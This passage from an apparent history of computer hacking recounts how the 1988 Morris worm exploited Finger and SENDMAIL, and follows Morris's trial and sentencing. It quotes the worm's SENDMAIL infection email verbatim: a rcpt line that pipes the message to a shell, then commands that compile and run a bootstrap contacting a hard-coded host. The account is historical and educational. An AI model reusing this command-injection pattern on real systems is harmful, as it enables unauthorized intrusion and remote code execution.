Here’s where the mischief begins: The Finger server does not just create a data buffer on the stack. It also “pushes” directions on the stack so that the operating system knows how to return to the server after it leaves the stack. These directions back are known as return instruction pointers—much like dog-earing pages in the front of the math notebook. Normally, overwriting the return instruction pointer would be catastrophic—it would crash the program because the computer would not know what to do after it placed data on the stack. But Morris realized that he could exploit this glitch. He could use the buffer overflow to wrest control from the computer running Finger.
Code Hiding in Data
To exploit the buffer overflow, Robert constructed a special request. Instead of sending a small string such as rtm, he sent a supersize request that was 536 bytes long. The first 512 bytes filled the data buffer set up by the Finger server. This part of the request was mostly garbage—just a meaningless binary sequence. But at the four-hundredth byte mark, Robert inserted malicious code. This code told the Finger server to stop looking up user names and cede control to the worm’s bootstrap program.
The end of the message—the last twenty-four bytes—contained a new return instruction pointer. Instead of giving the operating system directions on how to return to the server, this fake pointer directed the computer to the four-hundredth mark of the data buffer—in other words, to the malicious code hiding inside.
Thus, when Morris sent his supersize request to the Finger server, the buffer overflowed. The flood of data wiped out the return pointer back to the server and replaced it with a new instruction pointer to the malicious code in the data buffer. It’s as if the worm unfolded the original dog-ear, folded the corner of another page, and sent the student back to the wrong section of the notebook.
When Finger placed the supersize data on the stack, UNIX followed the new pointer. Except instead of returning to the server, the operating system went to the four-hundredth mark of the data buffer, found the malicious code to execute, and handed control to the worm.
Having gained control of the Finger server, what did the worm do? It told the Finger server to accept a copy of the worm’s bootstrap program. Once the server accepts the copy, the malicious code hidden in the buffer executes the bootstrap code. The bootstrap code sends for and receives a copy of all the worm’s binary files. The bootstrap code executes the worm binary files, and a new worm is born. The whole cycle begins again, with parent and child worms looking for trusted hosts, guessing passwords, sending email, and smashing the stacks of Finger servers.
The Finger attack shows how hackers can exploit network vulnerabilities. One of the main techniques that hackers use is to manipulate the ambiguity between code and data, that is, exploit the duality principle. The Finger program expected data, specifically, the name of a computer user to find. Morris instead sent code, specifically, instructions for wresting control from Finger.
Indeed, Morris used this basic technique in his SENDMAIL hack as well. Here is the email that the worm sent to hosts it wanted to infect:
mail from: </dev/null>
rcpt to: <"|sed -e '1,/^$/'d|/bin/sh; exit 0">
data
cd /usr/tmp
cat > x14481910.c << 'EOF'
[text of bootstrap program]
EOF
cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;rm -f x14481910 x14481910.c
.
quit
If this email doesn’t look normal to you, that’s because it isn’t. The “mail from:” field does not contain an email address—/dev/null is UNIX-speak for “blank.” Likewise, the “rcpt to:” field isn’t an address either. It contains an instruction to run the code in the body of the email. The body of the email starts after “data.” But the next lines do not contain text such as “LOL, see you tomorrow!”—they contain code. That code tells the recipient to copy the bootstrap program of the worm from the sender. (For a description of the code, see endnote.)
Thus, both the Finger and the SENDMAIL attacks exploited the duality principle, the inherent ambiguity between code and data. When the programs expected data, the worm sent code. In both cases, the worm wrested control from UNIX.
The worm was able to exploit the distinction between code and data because computation is simply the manipulation of symbols. All a computer can make out is a series of on and off states. As far as it is concerned, a series of bits could be encoding instructions or information. It could be the name rtm, an email confirming lunch, or an algorithm for self-replication. It is the programmer’s job to provide and then enforce the right interpretation—to ensure that the program rejects code input if the program expects data input and vice versa.
Trustworthy users don’t maliciously exploit the distinction between code and data. They input data when the program expects data and input code when the program expects code. But hackers take advantage of this intrinsic ambiguity: when programs expect data, hackers send code; when programs expect code, they send data.
“He Blew It on the First Try”
Dean Krafft was pacing outside the courtroom. As the director of facilities at Cornell’s computer-science department, and the first witness to be called by the prosecution, Krafft was tasked with explaining the worm to the jury. He wondered how he would ever explain data decryption to the jurors.
Given that the jury knew nothing about cybersecurity, Krafft’s testimony was more like a crash course in computers. Rasch’s direct examination was an endless series of technical questions: “What is internet?” “Can you tell the jury what a computer password is?” “Would you tell the jury what electronic mail is?” “Can you tell the jury what a running program is?” Krafft gave clear and distinct responses to each question.
It must have been excruciating to sit through the testimony. The information conveyed was not only dry and technical, but also repetitive. In addition to Krafft, Rasch called on thirteen other system administrators to testify to the jury about how the worm had invaded their systems. They all described the same experience—how on the night of November 2, a worm infiltrated their networks and caused many nodes to crash. After a frantic search through the night and the next day to discover how to control the worm, system administrators spent valuable time eliminating the intruders, patching their systems, and bringing them back up. Each specified a dollar amount expended on the effort. The total was $475,000—well over the statutory minimum of $1,000 for a felony conviction.
The highlight of the government’s case was the testimony of Paul Graham. Paul was to provide the jury with crucial evidence about Robert’s state of mind. Paul would show beyond a reasonable doubt that his friend released the worm intentionally. Paul would also supply the missing piece of the story, the very elephant in the courtroom, namely, how a brilliant young man could have come up with such a stupid idea. As it would turn out, Paul was egging Robert on.
According to Paul’s testimony, Robert traveled to Harvard on October 22, the weekend of the Head of the Charles, the annual regatta on the Charles River. Although his friend Andy Sudduth was racing his scull, Robert was not there for the competition. Cornell was on fall break and Robert had come to Cambridge to see old friends. He spent a lot of time in Aiken Lab, the home of Harvard’s Computer Science Faculty.
Paul testified that on Friday night, he was sitting at the desk of his adviser, David Mumford. Mumford was a mathematics professor who let his advisees use the computer in his office. Robert rushed into the room overcome with excitement. “He was pacing back and forth across the room, and at the end of one of his paces he just walked right up onto Mumford’s desk. [Robert] didn’t quite realize he was standing there, I don’t think.” While standing on Paul’s adviser’s desk, Robert reported that he’d found a big security hole in UNIX.
Paul was underwhelmed. “I thought it was very uninteresting, another way of breaking into the UNIX system, big deal.” But then Robert revealed the significance of this security flaw: “I could write a program and have the things spread from computer to computer.” Paul found that idea extremely exciting. As far as he knew, no one had ever released a worm on the public internet before. The idea was so inspired that Paul suggested that Robert write the worm up as his PhD thesis.
Paul was careful to point out that his friend never intended to cause harm. Paul and Robert talked about how to construct the worm without impacting the infected accounts. “There were all sorts of design features in the virus that he could have used, but they would have risked destroying data. They were out of the question.” The boys called the worm “the brilliant project.”
Paul did not learn that Robert had launched the worm until November 2, when Robert’s distraught 11:00 p.m. phone call reported how the brilliant project had run amok. According to Robert’s diagnosis, the worm was malfunctioning because he’d picked a reinfection rate that was too high. One out of seven was overloading the workstations.
Paul’s first reaction was anger at Robert—but not for the chaos he’d caused. “I said, ‘You idiot,’ because it was such a great idea and he just blew it through carelessness. I couldn’t believe it. I was so mad at first. That was really what annoyed me: it would never be possible to do this thing again, and he blew it on the first try.” Had Robert picked a higher number (say, to reinfect one out of seven hundred times), the worm would have spread harmlessly and the brilliant project would have succeeded brilliantly.
Robert Takes the Stand
Paul testified against his close friend because he had no choice. American courts have broad legal powers to compel witnesses to testify on threat of imprisonment. But the Fifth Amendment to the U.S. Constitution explicitly exempts defendants in criminal cases from testifying against themselves. The legal upcode of the United States, in other words, permits defendants to withhold incriminating testimonial data from juries.
Though Robert did not have to take the stand, the defense put him on anyway. They had little to lose. The prosecution had clearly established that Robert intentionally engaged in unauthorized access of government computers, preventing their use and causing at least $1,000 in damage. The only option was for Robert to admit to the jury that he intentionally released the worm but to deny that he intended to cause any damage. Robert’s pale complexion, thin frame, hangdog posture, ill-fitting suit, and utter lack of guile might sway the jury to show him mercy.
The plan failed. John Markoff, who attended the trial for The New York Times, described Robert as “slightly aloof, less endearing than he might have been.” His earnestness was his undoing. Rather than presenting as a contrite young man, Robert came off as a know-it-all. “So intent was he on explaining the technical details that, rather than steal the jurors’ hearts, he seemed slightly superior.”
Mark Rasch’s brutal cross-examination of Robert did not help. It constituted a master class for why defendants rarely testify at their own trials.
Q. Now, that worm, the one you finally ended up releasing, that was designed to break into many machines, right?
A. Yes, it was.
Q. It was designed to get into machines regardless of whether or not you personally had an account in any of those machines, right?
A. Right.
Q. It was designed to look for gateways and to seek out gateways and try to use them to break into gateways; is that right?
A. Yes, it was designed to break into gateways.
Q. And it was in terms of the type of machines it would actually try to hit, as opposed to running on, it was pretty much indiscriminate of the types of the machines it would try to hit.
A. That is right, there is no way to tell what kind of computer this is, no way to tell what type of computer without actually, you know, accessing it in some way.
Rasch did not let up.
Q. And [the worm] had more than one method to try to break into different computers.
A. Yes.
Q. And it used them in sort of a progression order; is that right?
A. It did.
Q. It would try the easy ones first and the more difficult ones in terms of computer resources after that.
A. I am not sure that the order was particularly relevant.
Q. But it was designed first to try, not necessarily in this order, but it was designed to try to exploit Finger; is that right?
A. It was, yes.
Q. And the reason it was going to exploit the Finger is to break into a computer; is that right?
A. That is right, it wanted to copy itself into that computer.
By the end, Rasch had gotten the defendant to make his case for him—gotten Robert to literally incriminate himself.
Q. Mr. Morris, would it be fair to say when you released the worm on November 2, 1988, it was your intention that the worm break into computers, regardless of whether or not you had a computer account on those computers?
A. Yes, it was.
Q. And you knew at that time that at least some people would have to expend some time and some energy in getting rid of this, figuring out what it was doing, and getting rid of it as a result of your actions; is that right?
A. Yes, that would have been a reasonable conclusion.
Mr. Rasch: I have no further questions, Your Honor.
Closing arguments for the prosecution and defense were held on Friday, January 19, 1990; the judge would submit the case to the jury on Monday. Robert and his family waited out the long weekend in frigid Syracuse.
On Monday morning, Judge Munson instructed the jury on the charge they were to consider. As he had done before the trial, Munson rejected Guidoboni’s interpretation of the law. The prosecution merely had to show that Morris intended to release the worm, not that he intended to cause any damage.
With this ruling, Robert Morris’s fate was sealed. The jury began deliberation at 2:00 p.m. It returned at 9:30 p.m. with a unanimous verdict. Robert stood expressionless as the jury foreman pronounced him guilty of felonious computer fraud.
Robert did not comment on the verdict, but his father did: “Whether it was the wrong verdict or the right verdict, I can’t say. I can say it was a disappointing verdict.” Bob added, “It’s perfectly honest to say that there is not a fraudulent or dishonest bone in his body.”
Sentencing was set for March 9, 1990.
The Sentence
Had Robert Morris released his worm a year earlier, Judge Munson would have had complete discretion over the punishment to be imposed. Congress had authorized a jail sentence of up to five years for anyone who had violated Section (a)(5) of the CFAA. This sentence, however, was a maximum penalty, not a mandatory one. A judge could impose any sentence the judge deemed just, provided it did not exceed five years.
In the meantime, however, Congress had passed a new series of laws known as the Federal Sentencing Guidelines. Enacting the Federal Sentencing Guidelines was an attempt to curtail the discretion of judges in setting penalties—to turn judges into sentencing computers. Judges would be required to use the guidelines to impose mandatory sentences as determined by a sentencing grid.
The Federal Sentencing Guidelines calculated penalties based on the kind of crime committed, the severity of the offense, and the prior criminal history and acceptance of responsibility of the offender. The worse the crime, the greater the harm, the longer the criminal history, and the less the remorse, the bigger the sentence.
The sentencing guidelines came into effect on November 1, 1987. Robert Morris released his worm on November 2, 1988. Judge Munson was, therefore, required to follow the sentencing guidelines. According to the guidelines, Robert Morris had to serve between fifteen and twenty-one months in federal prison—a harsh sentence for a first-time offender who had no malicious intent.
Code—both down and up—can be demanding. It provides instructions depending on the data in question. The worm followed its downcode, which led to constant reinfections and subsequent crashes. The Federal Sentencing Guidelines required judges to impose certain penalties if a crime was committed after November 1, 1987.
One main difference between downcode and upcode is formality. The central processing unit does not exercise discretion—it simply executes the instructions it is given. Legal code is significantly less formal. It contains terms such as mitigating circumstances and appropriate sentence that require moral discretion to apply. A central processing unit cannot execute instructions with such concepts. It is not built for moral reasoning.
Though the Federal Sentencing Guidelines were billed as a mandatory, formal scheme, Congress provided an escape clause. A judge could depart from the grid if there was “an aggravating or mitigating circumstance of a kind, or to a degree, not adequately taken into consideration by the Sentencing Commission.” Since Robert Morris Jr. was the first person ever to be convicted under the felony provision of the Computer Fraud and Abuse Act of 1986, there was no history on which to rely when subsuming hacking under fraud.
Judge Munson, therefore, used the escape clause. “Although in and of itself, this offense is an extremely serious offense, by placing it in the Fraud and Deceit guideline in this specific case, the total dollars lost overstates the seriousness of the offense.” Judge Munson did not, therefore, impose any jail sentence. Instead, Robert Morris was fined $10,000, required to serve four hundred hours of community service, and placed on probation for three years. Though the Morris family was tremendously relieved that Robert escaped prison, his mother, Anne, was defiant: “I still don’t feel that in any way, shape, or form my son is a felon.”
While the law did not care about Robert’s lack of intention to cause harm, the public seemed to. At sentencing, Judge Munson described the many letters calling for mercy. He complained that he could not walk outside the courthouse without getting advice on the case. Middle-aged women would even accost him at his country club to plead for leniency.
Most commentators thought the sentence fair, but Eugene Spafford did not think it was harsh enough. Some prison time, he insisted, was appropriate. He called for a boycott of any company that employed Robert Morris.
Fortunately for Robert, no one heeded the call. He moved back to Cambridge and worked for a software company. He needed money not only for living expenses, but also for the $10,000 fine imposed by Judge Munson. His family demanded that he pay it himself. The fine, however, was nothing compared to the total cost to the Morris family. Legal fees came close to $150,000.
Robert did not seek readmission to Cornell, applying instead to Harvard, which accepted him. He stayed away from hacking and wrote a dissertation on congestion control in TCP networks. In the preface to his dissertation, he thanks his adviser, H. T. Kung, who “took me under his wing at a time when my prospects seemed dark.” He also acknowledged Paul: “Paul Graham, my particular friend, understands how to lead a worthwhile life; would that I had his insight.” Last, Robert thanked his parents: “Finally, my parents still love me.”